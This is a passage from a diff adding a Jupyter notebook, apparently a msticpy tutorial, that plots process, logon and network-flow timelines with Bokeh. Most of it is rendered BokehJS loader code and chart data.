"#FDE724\"},\"marker\":{\"value\":\"diamond\"},\"size\":{\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"3366\",\"type\":\"Scatter\"},{\"attributes\":{\"fill_color\":{\"value\":\"#FDE724\"},\"line_color\":{\"value\":\"#FDE724\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"3347\",\"type\":\"Circle\"},{\"attributes\":{\"num_minor_ticks\":5,\"tickers\":[{\"id\":\"3399\"},{\"id\":\"3400\"},{\"id\":\"3401\"},{\"id\":\"3402\"},{\"id\":\"3403\"},{\"id\":\"3404\"},{\"id\":\"3405\"},{\"id\":\"3406\"},{\"id\":\"3407\"},{\"id\":\"3408\"},{\"id\":\"3409\"},{\"id\":\"3410\"}]},\"id\":\"3334\",\"type\":\"DatetimeTicker\"},{\"attributes\":{\"base\":24,\"mantissas\":[1,2,4,6,8,12],\"max_interval\":43200000.0,\"min_interval\":3600000.0,\"num_minor_ticks\":0},\"id\":\"3388\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"callback\":null,\"formatters\":{\"@TimeGenerated\":\"datetime\"},\"tooltips\":[[\"NewProcessName\",\"@NewProcessName\"],[\"LogonType\",\"@LogonType\"],[\"Account\",\"@Account\"],[\"TimeGenerated\",\"@TimeGenerated{%F %T.%3N}\"],[\"TargetLogonId\",\"@TargetLogonId\"]]},\"id\":\"3289\",\"type\":\"HoverTool\"},{\"attributes\":{\"source\":{\"id\":\"3288\"}},\"id\":\"3368\",\"type\":\"CDSView\"},{\"attributes\":{\"data_source\":{\"id\":\"3287\"},\"glyph\":{\"id\":\"3359\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"3360\"},\"view\":{\"id\":\"3362\"}},\"id\":\"3361\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"3385\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"base\":60,\"mantissas\":[1,2,5,10,15,20,30],\"max_interval\":1800000.0,\"min_interval\":1000.0,\"num_minor_ticks\":0},\"id\":\"3387\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{},\"id\":\"3379\",\"type\":\"AllLabels\"},{\"attributes\":{},\"id\":\"3331\",\"type\":\"LinearScale\"},{\"attributes\":{},\"id\":\"3377\",\"type\":\"AllLabels\"}],\"root_ids\":[\"3371\"]},\"title\":\"Bokeh Application\",\"version\":\"2.3.2\"}};\n  var render_items = [{\"docid\":\"42d79317-ace3-4f24-8ee2-14d0dcf2277d\",\"root_ids\":[\"3371\"],\"roots\":{\"3371\":\"56ac7278-7683-4c3e-98af-13cc19b42508\"}}];\n  root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n\n  }\n  if (root.Bokeh !== undefined) {\n    embed_document(root);\n  } else {\n    var attempts = 0;\n    var timer = setInterval(function(root) {\n      if (root.Bokeh !== undefined) {\n        clearInterval(timer);\n        embed_document(root);\n      } else {\n        attempts++;\n        if (attempts > 100) {\n          clearInterval(timer);\n          console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n        }\n      }\n    }, 10, root)\n  }\n})(window);",
+      "application/vnd.bokehjs_exec.v0+json": ""
+     },
+     "metadata": {
+      "application/vnd.bokehjs_exec.v0+json": {
+       "id": "3371"
+      }
+     },
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "procs_and_logons = {\n",
+    "    \"Processes\": {\n",
+    "        \"data\": processes_on_host,\n",
+    "        \"source_columns\": [\"NewProcessName\", \"Account\"],\n",
+    "    },\n",
+    "    \"Logons\": {\n",
+    "        \"data\": host_logons,\n",
+    "        \"source_columns\": [\"Account\", \"TargetLogonId\", \"LogonType\"],\n",
+    "    },\n",
+    "}\n",
+    "\n",
+    "display_timeline(\n",
+    "    data=procs_and_logons, title=\"Logons and Processes\", legend=\"left\", yaxis=False\n",
+    ");"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "# Plotting Series with Scalar Values\r\n",
+    "Often you may want to see a scalar value plotted with the series. \r\n",
+    "\r\n",
+    "The first example below uses the pandas `mp_timeline.plot_values()` accessor\r\n",
+    "to plot network flow data using the total flows recorded between\r\n",
+    "a pair of IP addresses.\r\n",
+    "\r\n",
+    "You can also import and use `display_timeline_values` from\r\n",
+    "`msticpy.nbtools.timeline`. This is shown in later examples\r\n",
+    "\r\n",
+    "Note that the majority of parameters are the same as `display_timeline` but\r\n",
+    "include a mandatory `value_col` parameter which indicates which value\r\n",
+    "you want to plot on the y (vertical) axis.\r\n",
+    "(this can also be specified as `y`)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 10,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-01-30T20:46:29.721503Z",
+     "start_time": "2020-01-30T20:46:29.525587Z"
+    }
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "    <div class=\"bk-root\">\n",
+       "        <a href=\"https://bokeh.org\" target=\"_blank\" class=\"bk-logo bk-logo-small bk-logo-notebook\"></a>\n",
+       "        <span id=\"3606\">Loading BokehJS ...</span>\n",
+       "    </div>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  var JS_MIME_TYPE = 'application/javascript';\n  var HTML_MIME_TYPE = 'text/html';\n  var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n  var CLASS_NAME = 'output_bokeh rendered_html';\n\n  /**\n   * Render data to the DOM node\n   */\n  function render(props, node) {\n    var script = document.createElement(\"script\");\n    node.appendChild(script);\n  }\n\n  /**\n   * Handle when an output is cleared or removed\n   */\n  function handleClearOutput(event, handle) {\n    var cell = handle.cell;\n\n    var id = cell.output_area._bokeh_element_id;\n    var server_id = cell.output_area._bokeh_server_id;\n    // Clean up Bokeh references\n    if (id != null && id in Bokeh.index) {\n      Bokeh.index[id].model.document.clear();\n      delete Bokeh.index[id];\n    }\n\n    if (server_id !== undefined) {\n      // Clean up Bokeh references\n      var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n      cell.notebook.kernel.execute(cmd, {\n        iopub: {\n          output: function(msg) {\n            var id = msg.content.text.trim();\n            if (id in Bokeh.index) {\n              Bokeh.index[id].model.document.clear();\n              delete Bokeh.index[id];\n            }\n          }\n        }\n      });\n      // Destroy server and session\n      var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n      cell.notebook.kernel.execute(cmd);\n    }\n  }\n\n  /**\n   * Handle when a new output is added\n   */\n  function handleAddOutput(event, handle) {\n    var output_area = handle.output_area;\n    var output = handle.output;\n\n    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n    if ((output.output_type != \"display_data\") || (!Object.prototype.hasOwnProperty.call(output.data, EXEC_MIME_TYPE))) {\n      return\n    }\n\n    var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n\n    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n      // store reference to embed id on output_area\n      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n    }\n    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n      var bk_div = document.createElement(\"div\");\n      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n      var script_attrs = bk_div.children[0].attributes;\n      for (var i = 0; i < script_attrs.length; i++) {\n        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n      }\n      // store reference to server id on output_area\n      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n    }\n  }\n\n  function register_renderer(events, OutputArea) {\n\n    function append_mime(data, metadata, element) {\n      // create a DOM node to render to\n      var toinsert = this.create_output_subarea(\n        metadata,\n        CLASS_NAME,\n        EXEC_MIME_TYPE\n      );\n      this.keyboard_manager.register_events(toinsert);\n      // Render to node\n      var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n      render(props, toinsert[toinsert.length - 1]);\n      element.append(toinsert);\n      return toinsert\n    }\n\n    /* Handle when an output is cleared or removed */\n    events.on('clear_output.CodeCell', handleClearOutput);\n    events.on('delete.Cell', handleClearOutput);\n\n    /* Handle when a new output is added */\n    events.on('output_added.OutputArea', handleAddOutput);\n\n    /**\n     * Register the mime type and append_mime function with output_area\n     */\n    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n      /* Is output safe? */\n      safe: true,\n      /* Index of renderer in `output_area.display_order` */\n      index: 0\n    });\n  }\n\n  // register the mime type if in Jupyter Notebook environment and previously unregistered\n  if (root.Jupyter !== undefined) {\n    var events = require('base/js/events');\n    var OutputArea = require('notebook/js/outputarea').OutputArea;\n\n    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n      register_renderer(events, OutputArea);\n    }\n  }\n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(\"3606\");\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error(url) {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (let i = 0; i < css_urls.length; i++) {\n      const url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\": \"XypntL49z55iwGVUW4qsEu83zKL3XEcz0MjuGOQ9SlaaQ68X/g+k1FcioZi7oQAc\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\": \"bEsM86IHGDTLCS0Zod8a8WM6Y4+lafAL/eSiyQcuPzinmWNgNO2/olUF0Z2Dkn5i\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\": \"TX0gSQTdXTTeScqxj6PVQxTiRW8DOoGVwinyi1D3kxv7wuxQ02XkOxv0xwiypcAH\"};\n\n    for (let i = 0; i < js_urls.length; i++) {\n      const url = js_urls[i];\n      const element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.async = false;\n      element.src = url;\n      if (url in hashes) {\n        element.crossOrigin = \"anonymous\";\n        element.integrity = \"sha384-\" + hashes[url];\n      }\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\"];\n  var css_urls = [];\n  \n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (var i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    if (force === true) {\n        display_loaded();\n      }} else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(\"3606\")).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));",
+      "application/vnd.bokehjs_load.v0+json": ""
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "  <div class=\"bk-root\" id=\"ba32b7cb-1e10-47bc-892d-888d8f4e515f\" data-root-id=\"3912\"></div>\n"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": "(function(root) {\n  function embed_document(root) {\n    \n  var docs_json = {\"3416e19e-90a1-4fa9-8006-26b4765840b5\":{\"defs\":[],\"roots\":{\"references\":[{\"attributes\":{\"children\":[{\"id\":\"3608\"},{\"id\":\"3882\"}]},\"id\":\"3912\",\"type\":\"Column\"},{\"attributes\":{\"data_source\":{\"id\":\"3642\"},\"glyph\":{\"id\":\"3644\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"3645\"},\"view\":{\"id\":\"3647\"}},\"id\":\"3646\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"months\":[0,1,2,3,4,5,6,7,8,9,10,11]},\"id\":\"3959\",\"type\":\"MonthsTicker\"},{\"attributes\":{},\"id\":\"3889\",\"type\":\"LinearScale\"},{\"attributes\":{},\"id\":\"3629\",\"type\":\"ResetTool\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"3631\",\"type\":\"PanTool\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"blue\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"blue\"},\"x\":{\"field\":\"FlowStartTime\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"3904\",\"type\":\"Circle\"},{\"attributes\":{\"formatter\":{\"id\":\"3899\"},\"major_label_policy\":{\"id\":\"3920\"},\"ticker\":{\"id\":\"3894\"}},\"id\":\"3893\",\"type\":\"DatetimeAxis\"},{\"attributes\":{},\"id\":\"3630\",\"type\":\"SaveTool\"},{\"attributes\":{},\"id\":\"3788\",\"type\":\"Selection\"},{\"attributes\":{},\"id\":\"3891\",\"type\":\"LinearScale\"},{\"attributes\":{\"axis\":{\"id\":\"3623\"},\"dimension\":1,\"grid_line_alpha\":0.3,\"grid_line_color\":\"navy\",\"minor_grid_line_alpha\":0.1,\"minor_grid_line_color\":\"navy\",\"ticker\":null},\"id\":\"3626\",\"type\":\"Grid\"},{\"attributes\":{},\"id\":\"3752\",\"type\":\"Selection\"},{\"attributes\":{\"days\":[1,15]},\"id\":\"3958\",\"type\":\"DaysTicker\"},{\"attributes\":{\"num_minor_ticks\":5,\"tickers\":[{\"id\":\"3952\"},{\"id\":\"3953\"},{\"id\":\"3954\"},{\"id\":\"3955\"},{\"id\":\"3956\"},{\"id\":\"3957\"},{\"id\":\"3958\"},{\"id\":\"3959\"},{\"id\":\"3960\"},{\"id\":\"3961\"},{\"id\":\"3962\"},{\"id\":\"3963\"}]},\"id\":\"3894\",\"type\":\"DatetimeTicker\"},{\"attributes\":{\"months\":[0,2,4,6,8,10]},\"id\":\"3960\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"click_policy\":\"hide\",\"label_text_font_size\":\"8pt\",\"location\":\"center\"},\"id\":\"3881\",\"type\":\"Legend\"},{\"attributes\":{\"active_multi\":{\"id\":\"3907\"},\"tools\":[{\"id\":\"3907\"}]},\"id\":\"3897\",\"type\":\"Toolbar\"},{\"attributes\":{\"data\":{\"AllExtIPs\":[\"90.130.70.73\"],\"FlowDirection\":[\"O\"],\"FlowStartTime\":{\"__ndarray__\":\"AID6cjaOdkI=\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[1]},\"FlowType\":[\"ExternalPublic\"],\"L7Protocol\":[\"ftp\"],\"TotalAllowedFlows\":{\"__ndarray__\":\"AAAAAAAA8D8=\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[1]},\"color\":[\"#440154\"],\"index\":[455],\"y_index\":[0]},\"selected\":{\"id\":\"3655\"},\"selection_policy\":{\"id\":\"3656\"}},\"id\":\"3642\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"data\":{\"AllExtIPs\":[\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.179.17.38\"],\"FlowDirection\":[\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\"],\"FlowStartTime\":{\"__ndarray__\":\"AADRNjWOdkIAgI9jOI52QgCAj847jnZCAICPtj+OdkIAgI+kQo52QgCAj4xGjnZCAICPekmOdkIAgI9iTY52QgCAj1BQjnZCAICPOFSOdkIAgI8mV452QgCAjw5bjnZCAICP/F2OdkIAgI/kYY52QgCAj9JkjnZCAICPumiOdkIAgI+oa452QgCAj5BvjnZCAICPfnKOdkIAgI9mdo52QgCAj056jnZCAICPPH2OdkIAgI8kgY52QgAAzhKEjnZCAADO+oeOdkIAAM7oio52QgAAztCOjnZCAADOvpGOdkIAAM6mlY52QgAAzpSYjnZCAADOfJyOdkIAAM5qn452QgAAzlKjjnZCAADOUqOOdkI=\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[34]},\"FlowType\":[\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\"],\"L7Protocol\":[\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\"],\"TotalAllowedFlows\":{\"__ndarray__\":\"AAAAAAAAEEAAAAAAAAAUQAAAAAAAABBAAAAAAAAACEAAAAAAAAAQQAAAAAAAAAhAAAAAAAAAEEAAAAAAAAAIQAAAAAAAABBAAAAAAAAACEAAAAAAAAAQQAAAAAAAAAhAAAAAAAAAEEAAAAAAAAAIQAAAAAAAABBAAAAAAAAACEAAAAAAAAAQQAAAAAAAAAhAAAAAAAAAEEAAAAAAAAAQQAAAAAAAAAhAAAAAAAAAEEAAAAAAAAAIQAAAAAAAABBAAAAAAAAACEAAAAAAAAAQQAAAAAAAAAhAAAAAAAAAEEAAAAAAAAAIQAAAAAAAABBAAAAAAAAACEAAAAAAAAAQQAAAAAAAAABAAAAAAAAAAEA=\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[34]},\"color\":[\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\"],\"index\":[421,422,423,424,425,426,427,428,429,430,431,432,433,434,435,436,437,438,439,440,441,442,443,444,445,446,447,448,449,450,451,452,453,454],\"y_index\":[5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5]},\"selected\":{\"id\":\"3826\"},\"selection_policy\":{\"id\":\"3827\"}},\"id\":\"3803\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"3627\",\"type\":\"WheelZoomTool\"},{\"attributes\":{\"data\":{\"AllExtIPs\":[\"65.55.44.109\",\"13.71.172.128\",\"13.71.172.130\",\"40.124.45.19\",\"104.43.212.12\",\"40.77.232.95\",\"65.55.44.109\",\"40.77.228.69\",\"13.71.172.130\",\"13.71.172.128\",\"40.124.45.19\",\"172.217.15.99\",\"65.55.44.109\",\"13.71.172.130\",\"40.85.232.64\",\"13.71.172.128\",\"104.43.212.12\",\"40.124.45.19\",\"20.38.98.100\",\"23.96.64.84\",\"65.55.44.108\",\"65.55.44.109\",\"13.71.172.128\",\"13.71.172.130\",\"40.124.45.19\",\"40.77.232.95\",\"13.71.172.130\",\"13.71.172.128\",\"40.77.228.69\",\"65.55.44.109\",\"40.124.45.19\",\"23.96.64.84\",\"20.38.98.100\",\"13.82.152.48\",\"65.55.44.109\",\"13.71.172.130\",\"13.71.172.128\",\"40.124.45.19\",\"13.71.172.130\",\"13.71.172.128\",\"40.77.232.95\",\"65.55.44.109\",\"40.124.45.19\",\"40.77.226.250\",\"20.38.98.100\",\"13.71.172.128\",\"13.65.107.32\",\"40.124.45.19\",\"13.67.143.117\",\"52.165.170.112\",\"52.173.28.179\",\"13.71.172.130\",\"40.77.232.95\",\"13.68.93.109\",\"40.77.228.69\",\"65.52.108.92\",\"65.55.44.109\",\"13.83.149.5\",\"13.83.148.235\",\"168.62.32.212\",\"20.38.98.100\",\"40.121.3.131\",\"52.239.152.10\",\"23.47.27.169\",\"65.55.163.78\",\"172.217.15.78\",\"65.55.163.76\",\"172.217.8.3\",\"13.74.179.117\",\"65.55.252.190\",\"13.71.172.128\",\"13.71.172.130\",\"40.124.45.19\",\"13.65.107.32\",\"13.67.143.117\",\"40.69.153.67\",\"65.55.44.109\",\"40.77.228.69\",\"99.84.104.63\",\"157.55.134.136\",\"72.21.81.200\",\"204.79.197.200\",\"13.68.226.108\",\"212.13.197.231\",\"46.43.34.31\",\"13.71.172.128\",\"13.71.172.130\",\"52.183.114.173\",\"40.124.45.19\",\"13.65.107.32\",\"65.55.44.109\",\"40.79.85.125\",\"40.77.228.69\",\"13.67.143.117\",\"104.43.212.12\",\"52.239.152.10\",\"20.38.98.100\",\"40.77.226.250\",\"13.71.172.130\",\"65.55.44.109\",\"65.55.44.108\",\"40.77.226.250\",\"40.77.232.95\",\"13.71.172.130\",\"40.79.85.125\",\"65.55.44.109\",\"40.124.45.19\",\"20.38.98.100\",\"13.71.172.130\",\"40.124.45.19\",\"65.55.44.109\",\"40.77.228.69\",\"172.217.8.3\",\"13.71.172.130\",\"65.55.44.109\",\"65.55.44.108\",\"40.77.228.69\",\"40.124.45.19\",\"13.71.172.130\",\"65.55.44.108\",\"65.55.44.109\",\"40.77.232.95\",\"72.21.81.200\",\"13.71.172.130\",\"20.38.98.100\",\"40.124.45.19\",\"13.68.93.109\",\"65.55.44.108\",\"40.77.228.69\",\"65.55.44.109\",\"13.71.172.130\",\"65.55.44.108\",\"65.55.44.109\",\"40.77.226.250\",\"40.124.45.19\",\"40.77.232.95\",\"13.71.172.130\",\"65.55.44.108\",\"65.55.44.109\",\"172.217.15.99\",\"40.124.45.19\",\"20.38.98.100\",\"13.71.172.130\",\"65.55.44.109\",\"40.77.228.69\",\"13.71.172.130\",\"40.124.45.19\",\"40.77.228.69\",\"65.55.44.109\",\"65.55.44.108\",\"40.77.226.250\",\"13.71.172.130\",\"20.38.98.100\",\"65.55.44.108\",\"65.55.44.109\",\"40.77.226.250\",\"40.77.232.95\",\"72.21.81.200\",\"13.71.172.130\",\"65.55.44.109\",\"157.55.135.128\",\"40.124.45.19\",\"13.71.172.130\",\"40.124.45.19\",\"65.55.44.109\",\"40.77.228.69\",\"20.38.98.100\",\"172.217.15.99\",\"172.217.8.14\",\"52.165.170.112\",\"13.89.220.65\",\"13.71.172.130\",\"65.55.44.109\",\"65.55.44.108\",\"40.77.228.69\",\"40.124.45.19\",\"13.71.172.130\",\"40.77.228.69\",\"65.55.44.109\",\"40.124.45.19\",\"40.77.226.250\",\"13.71.172.130\",\"40.124.45.19\",\"65.55.44.108\",\"40.77.228.69\",\"65.55.44.109\",\"40.77.226.250\",\"20.38.98.100\",\"13.71.172.130\",\"40.124.45.19\",\"65.55.44.109\",\"72.21.81.200\",\"13.71.172.130\",\"40.77.232.95\",\"65.55.44.109\",\"40.124.45.19\",\"13.71.172.130\",\"65.55.44.109\",\"40.77.228.69\",\"40.124.45.19\",\"172.217.15.99\",\"13.71.172.130\",\"40.124.45.19\",\"65.55.44.109\",\"40.77.228.69\",\"52.165.170.112\",\"52.165.175.144\",\"13.71.172.130\",\"52.165.170.112\",\"13.89.220.65\",\"52.165.175.144\",\"65.55.44.109\",\"40.77.232.95\",\"20.38.98.100\",\"40.124.45.19\",\"13.71.172.128\",\"13.71.172.130\",\"52.173.26.181\",\"52.165.170.112\",\"13.67.143.117\",\"13.65.107.32\",\"40.124.45.19\",\"20.42.24.50\",\"65.55.44.109\",\"40.77.226.250\",\"13.74.179.117\",\"13.64.188.245\",\"13.83.148.218\",\"65.55.163.80\",\"40.77.232.95\",\"13.71.172.128\",\"13.71.172.130\",\"13.65.107.32\",\"40.124.45.19\",\"65.55.44.108\",\"65.55.44.109\",\"13.68.93.109\",\"13.67.143.117\",\"72.21.81.200\",\"204.79.197.200\",\"134.170.58.123\",\"40.77.226.250\",\"40.77.232.95\",\"13.71.172.130\",\"13.71.172.128\",\"13.65.107.32\",\"40.124.45.19\",\"13.67.143.117\",\"65.55.44.109\",\"40.77.228.69\",\"20.38.98.100\",\"172.217.15.99\",\"13.71.172.130\",\"13.71.172.128\",\"13.65.107.32\",\"40.124.45.19\",\"40.77.228.69\",\"65.55.44.108\",\"65.55.44.109\",\"13.67.143.117\",\"13.71.172.128\",\"13.71.172.130\",\"13.65.107.32\